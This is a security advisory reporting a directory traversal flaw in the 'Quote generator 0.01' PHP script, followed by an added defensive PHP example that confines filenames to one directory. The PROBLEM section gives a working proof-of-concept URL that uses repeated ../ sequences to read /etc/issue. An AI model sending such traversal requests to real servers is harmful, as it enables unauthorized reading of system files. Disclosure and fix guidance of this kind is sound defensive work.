COMMAND

    Quote generator

SYSTEMS AFFECTED

    Quote generator 0.01

PROBLEM

    Cabezon Aurélien found the following.  Quote generator 0.01 (PHP
    script) by eric personn is vulnerable to the ../.. (directory
    traversal) bug.  Try this:

        www.yourhost.com/quote.html?filename=../../../../../../../../../../../../../../../../etc/issue&path_to_font_file=ariali.ttf

    It gives you the content of the /etc/issue file.

SOLUTION

    Nothing yet.
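
    As an added example (not code from the Quote generator script or
    its author), one way a PHP script can confine the filename
    parameter to a single directory.  QUOTE_DIR and
    resolve_quote_file() are hypothetical names and the directory path
    is an assumption, since the advisory does not show the script's
    source:

```php
<?php
// Added example. QUOTE_DIR and resolve_quote_file() are hypothetical names;
// the advisory does not show how the original script opens the file.
const QUOTE_DIR = '/var/www/quotes';   // assumed directory holding quote files

/**
 * Map a request-supplied name to a regular file inside $baseDir.
 * Returns the canonical path, or null if the name is not acceptable.
 */
function resolve_quote_file($name, string $baseDir): ?string
{
    // Query parameters can arrive as arrays (filename[]=x); accept strings only.
    if (!is_string($name) || $name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    // Allow a bare file name only: no slashes, no backslashes, no leading dot.
    if (!preg_match('/\A[A-Za-z0-9_-]+(\.[A-Za-z0-9]+)?\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ../ sequences and follows symlinks, so the
    // containment check below runs on the path that would really be opened.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;   // resolved outside the quote directory
    }
    return $path;
}

$file = resolve_quote_file($_GET['filename'] ?? '', QUOTE_DIR);
if ($file === null) {
    http_response_code(400);
    exit('Invalid filename');
}
$quotes = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
```

    The path_to_font_file parameter in the URL above is also taken
    from the request, so the same check, pointed at a font directory,
    would apply to it.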